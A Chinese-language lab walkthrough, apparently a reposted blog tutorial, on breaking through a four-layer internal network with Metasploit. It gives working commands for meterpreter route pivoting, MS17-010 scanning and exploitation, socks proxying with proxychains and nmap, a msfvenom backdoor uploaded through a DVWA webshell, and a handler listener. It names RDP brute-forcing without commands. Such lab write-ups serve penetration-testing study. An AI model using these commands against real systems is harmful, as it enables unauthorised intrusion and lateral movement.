使用msf入侵多层级网络架构

gclome

原文链接：使用msf入侵多层级网络架构

假设，有一个多层网络环境，每层靶机只与相邻服务器互通，那么，如何从Hack的笔记本层层突破，获取到第4层靶机Server5的系统权限呢？

首先，我们通过Web入侵获得Server1权限，并通过横向渗透到Server2，获悉Server2可连外网、双网卡。在这里，我们以Server2作为攻击跳板机继续入侵。

第1层靶机→第2靶机

1、获取内网网段信息

1. meterpreter > run get_local_subnets
   
2. 
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. Local subnet: 10.0.0.0/255.255.255.0
   
6. Local subnet: 10.0.1.0/255.255.255.0

复制代码

通过内网本地路由查询，可以获悉内网网段地址为：10.0.1.0/24。


2、添加去往第二层内网网段（10.0.1.0/24）的静态路由。

1. meterpreter > run autoroute -s 10.0.1.0/24
   
2. 
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. [*] Adding a route to 10.0.1.0/255.255.255.0...
   
6. [+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3
   
7. [*] Use the -p option to list all active routes

复制代码

3、扫描内网主机，使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。

1. use auxiliary/scanner/smb/smb_ms17_010
   
2. show options
   
3. set rhosts 10.0.1.0/24
   
4. set threads 50
   
5. run

复制代码

通过扫描发现10.0.1.2存在MS-17010漏洞。

4、通过MS-17010漏洞获取Server3的系统权限。

1. use exploit/windows/smb/ms17_010_psexec
   
2. set rhost 10.0.1.2
   
3. set payload windows/meterpreter/bind_tcp
   
4. run

复制代码

5、成功获取第二层靶机权限，查看ip地址，发现第三个网段。

第2层靶机→第3靶机

1、添加第三个网段的静态理由。

1. meterpreter > run autoroute -s 10.0.2.0/24
   
2. 
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. [*] Adding a route to 10.0.2.0/255.255.255.0...
   
6. [+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2
   
7. [*] Use the -p option to list all active routes

复制代码

2、使用MS17-010扫描无果，发现10.0.2.2主机存活，利用msf搭建socks代理

1. use auxiliary/server/socks4a
   
2. set srvport 9999
   
3. run

复制代码

3、在攻击机Kali中，修改配置文件/etc/proxychains.conf

1. socks4 10.0.0.2 9999

复制代码

4、使用proxychains 对第三层靶机进行端口扫描：

1. proxychains nmap -Pn -sT 10.0.2.2 -p1-1000

复制代码

5、在Firefox中设置socks代理。




本地就可以直接访问到第三层靶机，在DVWA中，通过任意文件上传msf后门，获取站点权限。


6、利用msfvenom生成木马后门：

1. msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe

复制代码

攻击机监听：

1. use exploit/multi/handler
   
2. set PAYLOAD windows/meterpreter/bind_tcp
   
3. set RHOST 10.0.2.2
   
4. set LPORT 8888
   
5. set ExitOnSession false
   
6. exploit -j -z

复制代码

7、在webshell中，上传并成功执行shell.exe，成功返回Server4的权限。


第3层靶机→第4靶机


1、添加第四个网段的静态理由。

1. meterpreter > run autoroute -s 10.0.3.0/24
   
2. 
   
3. [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
   
4. [!] Example: run post/multi/manage/autoroute OPTION=value [...]
   
5. [*] Adding a route to 10.0.3.0/255.255.255.0...
   
6. [+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2
   
7. [*] Use the -p option to list all active routes

复制代码

2、使用msf开启socks

1. use auxiliary/server/socks4a
   
2. set srvport 6666
   
3. run

复制代码

3、探测第四个网段存活的主机，发现10.0.3.2 开放了3389端口。

1. proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,3389

复制代码

4、将第四层目标主机的3389流量转发到代理服务器中。


5、在本地对RDP账号密码进行爆破：


6、爆破成功后，使用账号密码成功登录服务器。